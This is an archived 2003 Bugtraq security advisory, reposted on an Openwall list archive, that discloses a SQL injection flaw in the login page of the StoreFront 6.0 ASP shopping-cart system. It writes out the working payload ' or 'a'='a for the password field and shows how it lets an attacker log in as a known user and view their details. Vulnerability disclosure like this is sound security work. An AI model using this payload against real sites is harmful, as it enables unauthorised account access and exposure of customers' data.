lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20030712135646.21901.qmail@www.securityfocus.com>
Date: 12 Jul 2003 13:56:46 -0000
From: G00db0y <G00db0y@...e-h.org>
To: bugtraq@...urityfocus.com
Subject: ZH2003-3SA (security advisory): Storefront sql injection: users
    info disclosure




ZH2003-3SA (security advisory): Storefront sql injection: users info 
disclosure
Published: 12/07/2003

Released: 12/07/2003

Name: Storefront sql injection: users info disclosure

Affected Systems: StoreFront 6.0 (and older versions?)

Issue: Remote attackers can obtain users info

Author: G00db0y@...e-h.org

Description

***********

Zone-h Security Team has discovered a serious security flaw in StoreFront 
6.0 
(and older versions?). "Storefront offers merchants and developers a 
feature 
rich, fully customizable e-commerce solution at a fraction of the cost to 
deploy 
and maintain."

Details

*******

Storefront is an ASP shopping cart / storefront system that covers all 
the 
needs for ecommerce web sites. 

It's possible to retrieve sensible users information. There is a sql 
injection vulnerability in /login.asp of StoreFront system. It's possible
to login with this email id and password:
' or 'a'='a

to have then access to the first user in database structure. If an 
attacker 
knew any email address of a registered user, it'll be possible for him to 
retrieve
the  registered uses's information from this login page. 

Example: 

Email of registered user: example@...mple.com

Email id (user in the login.asp): example@...mple.com
Password: ' or 'a'='a


Solution:

*********

The vendor has been contacted and a patch is not yet produced


Suggestions:

************

Nothing

G00db0y - www.zone-h.org admin

Original advisory here: http://www.zone-h.org/en/advisories/read/id=2684/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ